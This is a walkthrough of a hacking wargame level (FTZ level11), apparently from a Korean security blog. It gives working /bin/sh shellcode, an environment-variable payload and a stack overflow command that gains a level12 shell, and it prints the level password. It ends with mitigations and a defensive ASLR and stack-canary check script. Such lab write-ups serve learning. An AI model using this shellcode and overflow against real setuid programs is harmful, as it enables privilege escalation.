Security_Misc/ftz
level11
정지홍
2024. 8. 2. 20:01







First, prepare the shellcode.
It executes /bin/sh.
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
Next, try registering an environment variable:
[level11@ftz level11]$ export env=$(python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"')

[level11@ftz level11]$ ./attackme `python -c 'print "A"*268 + "\x54\xff\xff\xbf"'`
sh-2.05b$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05b$ id -u
3092
sh-2.05b$ id -g
3091
sh-2.05b$ whoami
level12
sh-2.05b$ my-pass
TERM environment variable not set.
Level12 Password is "it is like this".
How can the method above be prevented?
- ASLR
- stack canaries
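
One way to check whether a host and a binary actually have the two mitigations listed above (an added example, not part of the original post). The function names and the sample symbol lines are constructed for illustration; `audit` assumes a Linux host with `readelf` installed.

```shell
#!/bin/sh
# Added example: report the state of ASLR and stack canaries.

# Constructed sample lines in the style of `readelf -s --wide` output.
SAMPLE_PROTECTED='     5: 00000000     0 FUNC    GLOBAL DEFAULT  UND __stack_chk_fail@GLIBC_2.4 (3)
     6: 00000000     0 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.0 (2)'
SAMPLE_UNPROTECTED='     5: 00000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.0 (2)
     6: 00000000     0 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.0 (2)'

# Interpret the content of /proc/sys/kernel/randomize_va_space.
aslr_verdict() {
    case "$1" in
        0) echo "disabled" ;;  # fixed layout: stack addresses repeat between runs
        1) echo "partial" ;;   # stack, mmap and vDSO randomized; brk heap is not
        2) echo "full" ;;      # brk heap randomized as well
        *) echo "unknown" ;;
    esac
}

# Binaries built with a stack protector reference __stack_chk_fail.
# "present" means at least one function is protected, not necessarily all.
canary_verdict() {
    if printf '%s\n' "$1" | grep -q '__stack_chk_fail'; then
        echo "present"
    else
        echo "absent"
    fi
}

# audit BINARY: print both verdicts for this host and the given ELF file.
audit() {
    aslr="unknown"
    if [ -r /proc/sys/kernel/randomize_va_space ]; then
        aslr=$(aslr_verdict "$(cat /proc/sys/kernel/randomize_va_space)")
    fi
    if syms=$(readelf -s --wide "$1" 2>/dev/null); then
        canary=$(canary_verdict "$syms")
    else
        canary="unknown"   # readelf missing or file not readable as ELF
    fi
    echo "ASLR: $aslr"
    echo "stack canary in $1: $canary"
}

if [ "$#" -ge 1 ]; then
    audit "$1"
fi
```

Run it as `sh audit.sh ./binary`. A binary reported as "absent" can be rebuilt with GCC's `-fstack-protector-strong`, and ASLR is switched on by setting `kernel.randomize_va_space` to 2.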